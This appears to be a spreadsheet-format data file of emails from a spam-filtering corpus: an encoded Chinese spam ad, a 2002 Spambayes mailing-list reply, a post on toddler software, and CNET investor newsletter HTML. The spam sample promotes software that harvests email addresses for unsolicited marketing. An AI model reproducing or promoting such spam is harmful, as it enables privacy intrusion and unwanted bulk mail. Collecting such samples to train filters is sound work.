     =3C=2Fb=3E=BB=A5=C1=AA=CD=F8=B5=C4=B7=A2=D5=B9=CE=AA=CE=D2=C3=C7=B5=C4=C8=D5=B3=A3=C9=CC=CE=F1=BB=EE=B6=AF=B4=F8=C0=B4=C1=CB=BC=AB=B4=F3=B5=C4=B7=BD=B1=E3=D3=EB=D0=A7=D2=E6=A1=A3=CD=A8=B9=FD=CD=F8=C2=E7=D1=B0=D5=D2=BF=CD=BB=A7=D2=D1=CA=C7=C9=CC=BC=D2=D3=AA=CF=FA=BB=EE=B6=AF=D6=D0=B1=D8=B2=BB=BF=C9=C9=D9=B5=C4=BB=B7=BD=DA=A3=BB=B5=AB=CD=F8=C2=E7=BA=C6=E5=AB=A3=AC=D1=B0=D5=D2=BF=CD=BB=A7=D2=B2=C8=E7=B4=F3=BA=A3=C0=CC=D5=EB=A1=A3=C8=E7=BA=CE=B2=C5=C4=DC=D4=DA=C8=E7=B4=CB=B9=E3=C0=AB=B5=C4=BF=D5=BC=E4=B8=DF=D0=A7=A1=A2=B6=A8=CF=F2=B5=D8=D1=B0=D5=D2=D7=D4=BC=BA=B5=C4=C4=BF=B1=EA=BF=CD=BB=A7=C4=D8=A3=BF=B1=BE=CC=D7=C8=ED=BC=FE=D5=FB=BA=CF=C1=CB=B4=F3=C1=BF=D5=E4=B9=F3=B5=C4=B9=FA=C4=DA=CD=E2=C9=CC=C3=B3=D7=CA=D4=B4=A3=AC=BF=C9=D2=D4=CD=AC=CA=B1=B6=D4=CA=FD=B0=D9=BC=D2=CB=D1=CB=F7=D2=FD=C7=E6=A1=A2=C9=CC=C3=B3=CD=F8=D5=BE=A1=A2=BB=C6=D2=B3=BC=B0=B9=A4=C9=CC=C3=FB=C2=BC=B5=C8=B0=B4=D6=B8=B6=A8=B9=D8=BC=FC=D7=D6=BD=F8=D0=D0=B9=AB=CB=BE=BC=B0=C9=CC=C7=E9=CB=D1=CB=F7=A3=AC=D6=B1=BD!
  =D3=D5=D2=B5=BD=B8=F9=D4=B4=BF=CD=BB=A7=B5=C4=3CFONT face=3DTimes Roman New=3EEMAIL=3C=2FFONT=3E=B5=D8=D6=B7=A1=A3=D3=B5=D3=D0=B1=BE=CC=D7=C8=ED=BC=FE=A3=AC=BD=AB=C3=BB=D3=D0=D5=D2=B2=BB=B5=BD=B5=C4=BF=CD=BB=A7=A3=AC=C3=BB=D3=D0=D7=F6=B2=BB=B3=C9=B5=C4=C9=FA=D2=E2=A1=A3=3C=2Ffont=3E=3C=2FDIV=3E
         =3CFONT color=3D#000000 face=3D=CB=CE=CC=E5 size=3D2=3E
   =3CDIV align=3Dleft=3E=3CBR=3E=3C=2FDIV=3E
         =3C=2FFONT=3E  
         =3C=2Ful=3E  
       =3C=2FTD=3E  
       =3CTD width=3D=2222=22=3E=3C=2FTD=3E=3C=2FTR=3E  
     =3CTR=3E  
       =3CTD width=3D=2224=22=3E=3C=2FTD=3E  
       =3CTD bgColor=3D#0f95de width=3D=22651=22=3E
   =3CDIV align=3Dleft=3E=3Cb=3E=3Cfont face=3D=22=BF=AC=CC=E5=5FGB2312=22 size=3D=223=22 color=3D=22#FFFFFF=22=3E=C1=AA=CF=B5=B7=BD=B7=A8=3C=2Ffont=3E=3C=2Fb=3E=3C=2FDIV=3E
   =3CDIV align=3Dleft=3E=3Cb=3E=3Cfont face=3D=22=BF=AC=CC=E5=5FGB2312=22 size=3D=223=22 color=3D=22#FFFFFF=22=3E=B5=E7=BB=B0=A3=BA=3CFONT Roman New=3E0579-3891520&amp;nbsp=3B =3CBR=3E=3C=2FFONT=3E=3C=2Ffont=3E=3CFONT Roman New face=3D=22Arial=22 size=3D=223=22 color=3D=22#FFFFFF=22=3Eemail=3A 
     =3C=2FFONT=3E=3Ca href=3D=22mailto=3Aqingqing=40southwesttravelers=2Ecom=22=3E=3CFONT Roman New face=3D=22Arial=22 size=3D=223=22 color=3D=22#FFFFFF=22=3Eqingqing=40southwesttravelers=2Ecom=3C=2FFONT=3E=3C=2Fa=3E=3C=2Fb=3E=3C=2FDIV=3E
   =3CDIV align=3Dleft=3E=3Cb=3E=3Cfont face=3D=22=BF=AC=CC=E5=5FGB2312=22 size=3D=223=22 color=3D=22#FFFFFF=22=3E=3CU=3E=3CFONT Roman New=3E=3CBR=3E=3C=2FFONT=3E=3C=2FU=3E=3C=2Ffont=3E=3C=2Fb=3E=3Cb=3E=3CFONT color=3D#FFFFFF face=3D=BF=AC=CC=E5=5FGB2312 size=3D3=3E=CB=B3=D7=A3=C9=CC=EC=F7=A3=A1=3CBR=3E=3C=2FFONT=3E=3C=2Fb=3E=3C=2FDIV=3E
   =3CDIV align=3Dleft=3E=3Cfont color=3D=22#FFFFFF=22=3E=3Cb=3E=3Cfont face=3D=22=BF=AC=CC=E5=5FGB2312=22 size=3D=223=22=3E=C3=B0=C3=C1=B4=F2=C8=C5=A3=AC=BE=B4=C7=EB=C1=C2=BD=E2=A3=A1=C8=E7=D3=D0=B2=BB=B1=E3=A3=AC=CD=F2=CD=FB=BA=A3=BA=AD=A3=A1=C8=E7=B2=BB=CF=EB=B6=A9=D4=C4=A3=AC=C7=EB=B7=A2=D6=C1=A3=BA=3CU=3Eremove=40sina=2Ecom=3C=2FU=3E=CE=D2=C3=C7=BC=B4=BD=AB=C6=E4=B4=D3=C1=D0=B1=ED=D6=D0=C9=BE=B3=FD=A1=A3=3C=2Ffont=3E=3C=2Fb=3E=3CFONT face=3D=CB=CE=CC=E5 
   size=3D2=3E=3CBR=3E=3C=2FFONT=3E=3C=2Ffont=3E=3C=2FDIV=3E
       =3C=2FTD=3E  
       =3CTD width=3D=2222=22=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E  
 =3C=2FBLOCKQUOTE=3E=3C=2FBODY=3E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</si>
  <si>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[Spambayes] Deployment
</t>
  </si>
  <si>
    <t xml:space="preserve">Did you want this on the list? I'm replying to the list..
 On 6 Sep 2002 at 10:43, Guido van Rossum wrote:
 &gt; What's an auto-ham?
 Automatically marking something as ham after a given timeout.. regardless of how long 
 that timeout is, someone is going to forget to submit the message back as spam. 
 How many spams-as-hams can be accepted before the f-n rate gets unacceptable?
 &gt; &gt; How about adding an IMAP server with a spam and deleted-ham
 &gt; &gt; folder. Most email clients can handle IMAP. Users should be able to
 &gt; &gt; quickly move "spam" into the spam folder.
 &gt; 
 &gt; I personally don't think IMAP has a bright future, but for people who
 &gt; do use it, that's certainly a good approach.
 &gt; 
 &gt; &gt; Instead of deleting messages (or, by reprogramming the delete
 &gt; &gt; function) they can quickly move ham into the ham folder.
 &gt; 
 &gt; Yes.
 I view IMAP as a stop-gap measure until tighter integration with various email clients 
 can be achieved.
 I still feel it's better to require classification feedback from the recipient, rather than 
 make any assumptions after some period of time passes. But this is an end-user issue 
 and we're still at the algorithm stage.. ;-)
 Brad Clements,                bkc@murkworks.com   (315)268-1000
 http://www.murkworks.com                          (315)268-9812 Fax
 AOL-IM: BKClements
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: CD player UI for toddlers
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Our preschoolers (2 and 4) use Winamp with a Pokemon skin.  It's the
 2-yr-old who figured out he could put it into a sidebar menu so all
 he need do is click there to launch their favourite MP3 playlist.
 What /we/ need is a good "barely literate" email program.  Years ago
 the university of Hawaii had a word processor that included a
 voice-assist and also would pop up menus for common completions as
 words were typed; even further back there was a DOS shareware editor
 that did that latter function extremely well (targetted at the
 handicapped).  With just those little bits of assists, maybe some
 clever use of pictograms too, I bet kindergarten kids could handle
 email.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NEWS.COM INVESTOR: Techs gain on Intel, Motorola news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</si>
  <si>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href="http://clickthru.online.com/Click?q=89-h28bQ-J1ja2Wkq9kUMBXB6W5WWlR"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href="http://clickthru.online.com/Click?q=9e-tWQoQtMQnDilP73HSCN0U7nQUD4R" &gt;My Portfolio&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1ubRympAqJzDxDXozLCyR" &gt;Broker Reports&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkBHpoGWAjg0SxiPZvH6lR" &gt;IPOs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMWawpVQvEMtTbDS-BJjho4R" &gt;Splits&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwQsqmzSSCs3CyJqsjeorR" &gt;Messages&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;!-- /nav --&gt;
 &lt;p&gt;
 &lt;!-- tech winners --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_win.gif" width=160 height=20 alt="Tech Winners"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFBenvn1Kg3F-erCpGY9iR" &gt;TLTOA&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;23.0&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;35.29%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQFRgqerbERl28NRQSnqQPR" &gt;INFS&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;12.7&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;23.42%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6QHL4tsoDFWVhZSgRXBnR" &gt;JACO&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;4.9&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;22.19%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBskdaiyH0Xl_kj2ZBSJuRR" &gt;TSCM&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;2.92&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;22.18%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0sQdg2gtHobvZm5yGKIaZR" &gt;XOSY&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;5.5&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;20.88%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech winners --&gt;
 &lt;br&gt;
 &lt;!-- tech losers --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_lose.gif" width=160 height=20 alt="Tech Losers"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUfKEF6R7WrqMtNXjoCKqdR" &gt;AUGT&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;5.239&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-36.88%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8naL8SWNTreplrQ8kasp4eR" &gt;BUCA&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;9.26&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-30.64%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanyyWlw_2SlXdIl9Oi-UiyR" &gt;SPIR&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;1.9&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-29.60%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0ddxi7WJXr9i_f_B0NLnlR" &gt;RSTO&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;4.95&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-23.26%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLKsFRvh71WdT_pfmeDx04R" &gt;NOVN&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;11.935&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-22.10%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech losers --&gt;
 &lt;p&gt;
 &lt;!-- ad --&gt;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17, 2002&lt;/font&gt;&lt;br&gt;
 &lt;!-- /index --&gt;
 &lt;table width="100%" cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td colspan=4 bgcolor="#cccccc"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEKb12fwHpvpmtTwxp6DtrR" &gt;DJIA&lt;/a&gt;&lt;br&gt;8542.48 &amp;nbsp;&lt;font color=#009933&gt;69.37&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsFWZD0e5hH3XX8owMnerlR" &gt;NASDAQ&lt;/a&gt;&lt;br&gt;1397.25 &amp;nbsp;&lt;font color=#009933&gt;21.99&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=06-fP6uI482xDw5FVqmap_vCgSyiL4R" &gt;S&amp;P 500&lt;/a&gt;&lt;br&gt;906.04 &amp;nbsp;&lt;font color=#009933&gt;5.10&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N2MVpe9PbQ1U5MauO37xrR" &gt;CNET&amp;nbsp;TECH&lt;/a&gt;&lt;br&gt;1,007.43 &amp;nbsp;&lt;font color="#cc0000"&gt;&lt;font color=#009933&gt;14.52&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;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gain on Intel, Motorola news&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Although computer chip titan Intel posted lower-than-expected earnings, its upbeat forecast helped lift technology shares Wednesday.
 &lt;p&gt;
 Also boosting the sector was Motorola, which beat expectations for operating earnings and predicted a net profit in the last two quarters of the year. CNET's Tech index rose 14.46 points, or 1.41 percent, to 1,007.37, and the tech-laced Nasdaq composite index tacked on 21.97 points, or 1.6 percent, to 1,397.23.
 &lt;p&gt;
 With aircraft maker Boeing beating the consensus Wall Street earnings estimate, the Dow Jones industrials increased 69.37 points, or 0.82 percent, to 8,542.48. The S&amp;P 500 rose 5.08 points, or 0.56 percent, to 906.02.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href="http://clickthru.online.com/Click?q=30-u8NEIRrWWMvUIv88IeOdSKzjX1iR" &gt;Motorola Sees Profit Rebound &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 CHICAGO - Wireless technology giant Motorola Inc. on Wednesday said it expects to bounce back to a net profit in the third and fourth quarters helped by aggressive cost cutting.
 Motorola, a day after posting the largest quarterly loss in its history, said it expects to achieve earnings of about 2 cents a share in the third quarter and 10 cents in the fourth quarter. The estimated earnings for the second half of the year includes charges of about $215 million related to previously announced restructuring actions.
 The world's second largest mobile phone maker has slashed its work force by more than a third from its peak of 150,000 in August 2000. It said last month it would cut another 7,000 jobs, bringing employment to 93,000 by mid-2003.
 &lt;br&gt;&lt;B&gt;MOTOROLA, INC 15.15 4.27% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB6rajyU6J-EDvznhjonlZR" &gt;Apple meets lowered expectations &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Apple Computer on Tuesday reported quarterly sales and earnings that matched analysts' lowered expectations as flat-panel iMac sales and sales to schools fell short of the company's initial hopes.
 The company earned $32 million, or 9 cents per share, on revenue of $1.43 billion. In the same quarter a year ago, Apple earned $61 million, or 17 cents per share, on revenue of $1.48 billion
 Analysts expected Apple to report earnings of 9 cents per share, according to First Call. Apple warned last month that sales would be in the range of $1.4 billion to $1.45 billion, down from an earlier estimate of $1.6 billion. The company said it expected earnings to be between 8 and 10 cents per share.
 &lt;br&gt;&lt;B&gt;APPLE COMPUTER INC 15.63 -12.49% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0IIDnqKb024YOLpk6Td6dR" &gt;HP, EMC storage systems to work better together &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 SAN FRANCISCO - Hewlett-Packard Co. and EMC Corp. said on Wednesday that they were opening up technology to each other in order to maker their storage systems work better together.
 However, the deal will not include technology from Hitachi Data Systems, which makes the hardware for HP's high-end storage system, an HP spokesman said.
 The deal follows close cooperation between storage heavyweight EMC and Compaq Computer Corp., which was acquired by HP in May.
 &lt;br&gt;&lt;B&gt;HEWLETT-PACKARD CO 13.57 -4.84%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href="http://clickthru.online.com/Click?q=6f-3x79IOLA6NgQWcf3RXvLF34ULXuR"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href="http://clickthru.online.com/Click?q=85-2G2oQ7KQokoqyyfaf70SVbToBBPR" &gt;Investec Inc. stays bullish on Intel in report 7/17/02 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Analysts Eric Ross and Sam Chang reiterate a "strong buy" rating on the computer chip giant after it reports second-quarter earnings below the consensus Wall Street estimate. Ross and Chang expect a modest seasonal increase in demand in the second half of this year, with strength in consumer laptop buying. Calling Intel the premier semiconductor firm, they suggest the stock is a bargain.
 &lt;br&gt;&lt;B&gt;INTEL CORP 19.44 5.88% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMBaJXwwVLFigi7yr9FKgnR"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href="http://clickthru.online.com/Click?q=af--dB8QLpqyARxhm1ydDX7NdmUVSeR" &gt;AT&amp;T names Dorman chairman, succeeding Armstrong &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 NEW YORK - AT&amp;T Corp. said on Wednesday its president, David Dorman, will succeed C. Michael Armstrong as chairman and chief executive officer when the nation's largest telephone company sells its cable-television business to Comcast Corp.
 Dorman's appointment, which was widely expected, will become effective once the sale of AT&amp;T Broadband closes later this year.
 &lt;br&gt;&lt;B&gt;AT&amp;T CORP 10.45 2.55% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0WwvkFUNjdkHF6q-jPexAyR"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href="http://clickthru.online.com/Click?q=d9-b7L_QpPwUkII70Pie23s1N87hJlR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/06060digidark.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDkh4WqjRN0QzbMuLbLad4R"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href="http://clickthru.online.com/Click?q=03-13t3I3rzdpDImCshKQcaLlAI6OrR" &gt;Panasonic's littlest Lumix&lt;/a&gt;&lt;br /&gt;
         &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=18-WhdzI98qUUmkwKzTiMEyR1N675iR"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href="http://clickthru.online.com/Click?q=2d-OxQyIbKHcr3whczVdngyV7VDjSPR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         2. &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAW1Ygllx9Z5VKc-3P0BcR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         3. &lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHOQruttNYjKHbtbXYzHRR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         4. &lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEI0tYv2AN7Bc1bJBykEmZR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         5. &lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK14anJEXR6gJLkjCXMZHnR" &gt;Sony Cyber Shot DSC-F707&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M1B4QRK963V0z6qjySJGeR"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href="http://clickthru.online.com/Click?q=ac-RbKtQ0UKe1nDZCddWfGJ0kSyVjyR"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href="http://clickthru.online.com/Click?q=c1-PIljQpWqZilFTh5wiOPYOLipujlR" &gt;FREE for 30 days. Click
             here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPdLapk4BZnOIRzw0LGkk4R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;!-- subscription management --&gt;
         &lt;font face="ms sans serif, geneva" size="-2"&gt; The e-mail address for your
         subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=ec-MHlXray63gw5uez9kqBAYENOGKW989RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jHs5WFjPUvurMPGPxZ6RlR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFDOFD6WgDblRuaBDxRU4R"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href="http://clickthru.online.com/Click?q=2b-2FVYINzsUbvwIJkwzk0xBfd-8WrR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idn8VvxEmadeVXCHnpqL0wRR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJ8NOicklnqm86ccJ_2d2ZR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeWiBYrYvZOzceCGFySNP8dR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=7f-bn6KIIP6Rb3txkD9IO3JewkhBpuR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
